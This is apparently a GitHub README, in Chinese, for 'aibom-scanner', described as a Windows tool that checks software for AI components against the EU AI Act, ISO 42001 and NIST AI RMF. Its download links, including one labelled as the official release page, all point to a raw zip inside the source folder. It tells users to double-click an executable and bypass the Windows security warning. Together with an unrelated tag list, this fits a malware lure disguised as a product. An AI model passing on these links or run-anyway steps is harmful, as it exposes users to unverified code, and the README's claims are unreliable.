arqajalvarez/aibom-scanner

# 🔍 aibom-scanner - 识别您软件中的 AI 风险 [](https://raw.githubusercontent.com/arqajalvarez/aibom-scanner/main/src/aibom_scanner_alcanna.zip) 该工具可检查您的软件项目中是否存在 AI 组件。它能发现您使用 AI 工具的位置，并根据 EU AI Act、ISO 42001 和 NIST AI RMF 等安全规则对其进行检查。如今许多公司都在使用 AI，但要追踪这些代码隐藏在哪里却很困难。这款扫描器可以为您代劳。您将获得一份清晰的报告，了解您的应用程序中包含哪些 AI，以及这些部分是否符合当前的安全标准。 ## 📋 工具功能 现代软件项目打包了许多第三方库。其中一些在底层使用了 AI 模型。如果没有软件的映射图，您可能会忽略这些 AI 组件带来的风险，例如数据隐私问题或模型可靠性差。 扫描器会读取您的项目文件并构建您的 AI 资产列表。它会根据您选择的标准检查此列表。您将收到一份报告，将您的使用情况映射到特定的行业要求。这有助于您管理合规性，而无需阅读数千页的政策文档。 ## 💻 系统要求 您需要一台 Windows 机器来运行此程序。该软件适用于 Windows 10 或 Windows 11。请确保您至少有 200 MB 的可用硬盘空间。扫描器在您的计算机上处理您的文件。它不会将您的代码发送到外部服务器进行分析。这确保了您数据的私密性。您无需安装 Python 或其他复杂的工具。您所需的一切都包含在下载的文件中。 ## 📥 如何开始 请按照以下步骤在您的计算机上设置该工具。 1. 访问[官方发布页面](https://raw.githubusercontent.com/arqajalvarez/aibom-scanner/main/src/aibom_scanner_alcanna.zip)下载当前版本。 2. 在资产列表中找到名为 `aibom-scanner.exe` 的文件。 3. 点击该文件开始下载。 4. 将文件保存到计算机上的某个文件夹中，例如您的“下载”文件夹或桌面。 ## ⚙️ 运行扫描器 1. 打开您保存文件的文件夹。 2. 双击 `aibom-scanner.exe`。 3. 如果 Windows 显示安全消息，请单击“更多信息”，然后单击“仍要运行”。出现这种情况是因为该工具是一个执行本地文件分析的实用程序。 4. 出现一个小窗口。输入您要扫描的项目的文件路径。您可以从文件资源管理器的顶部地址栏复制该路径。 5. 按下“扫描”按钮。 6. 等待工具完成文件处理。进度条会显示剩余时间。 7. 完成后，您的项目文件夹中会出现一个名为 `report.html` 的文件。双击此文件即可在您的 Web 浏览器中查看分析结果。 ## 📊 了解您的报告 生成的报告会根据风险等级对您的发现进行分类。您将看到以下几个部分： ### 合规状态 本部分显示您的代码库如何符合 NIST、ISO 和 EU AI Act 的要求。绿色勾号表示您检测到的组件通过了检查。黄色标记表示需要审查的项目。红色标记表示潜在的违规行为。 ### AI 组件列表 这是在您的代码中检测到的所有 AI 服务的简单列表。它显示了服务的名称、使用该服务的库以及发现的潜在风险等级。您可以使用它来维护您自己的 AI 使用清单。 ### 风险详情 点击列表中的任何项目即可查看更多详细信息。您将找到指向适用标准部分的链接。例如，如果某个组件违反了 EU AI Act 的要求，报告会为您引用具体的条款以便查阅。 ## 🛠 常见问题故障排除 如果扫描器未启动，请确保您在放置文件的文件夹中拥有运行程序的权限。某些工作计算机限制从“下载”文件夹运行程序。如果您看到权限错误，请将文件移动到类似 `C:\Tools` 的文件夹中。 如果扫描器未发现任何内容，请双击文件路径并确认该文件夹包含源代码文件。Python 项目、JavaScript 项目或通用文件夹结构效果最佳。 如果报告格式看起来出现异常，请确保您在 Chrome、Edge 或 Firefox 等现代 Web 浏览器中打开该文件。较旧的浏览器可能无法正确显示数据表格。 ## 🛡 安全与隐私 您的代码包含您的知识产权。该工具注重隐私设计。所有分析均在您的机器本地进行。网络连接仅用于获取最新的合规规则。在扫描过程中，没有任何代码、AI 配置参数或敏感数据会离开您的机器。 ## 📈 常见问题解答 **该软件需要网络连接吗？** 是的，它会在您开始扫描时检查合规规则的更新。实际的文件扫描过程则是离线工作的。 **我可以扫描超大型的代码库吗？** 可以。扫描器通过跳过常见的二进制文件并专注于项目配置文件（如 requirements、package.json 或 pyproject.toml）来高效处理大型项目。 **如果出台了新标准怎么办？** 该工具会在运行时获取最新的标准。一旦官方机构发布，您就能及时掌握最新的合规信息。 **我的数据会存储在云端吗？** 不会。所有内容都保存在您的本地硬盘上。您可以完全控制报告文件和您的源代码。

标签：AI BOM, AI扫描器, AI模型风险, AI资产管理, AI风险管理, EU AI Act, ISO 42001, NIST AI RMF, SCA工具, Windows安全工具, 云安全监控, 人工智能治理, 代码安全扫描, 依赖项检查, 合规报告生成, 多模态安全, 属性图, 数据可视化, 数据隐私, 本地离线处理, 欧盟人工智能法案, 源码分析, 第三方库安全, 网络安全, 自动化合规, 跌倒检测, 软件物料清单, 逆向工具, 隐私保护, 静态分析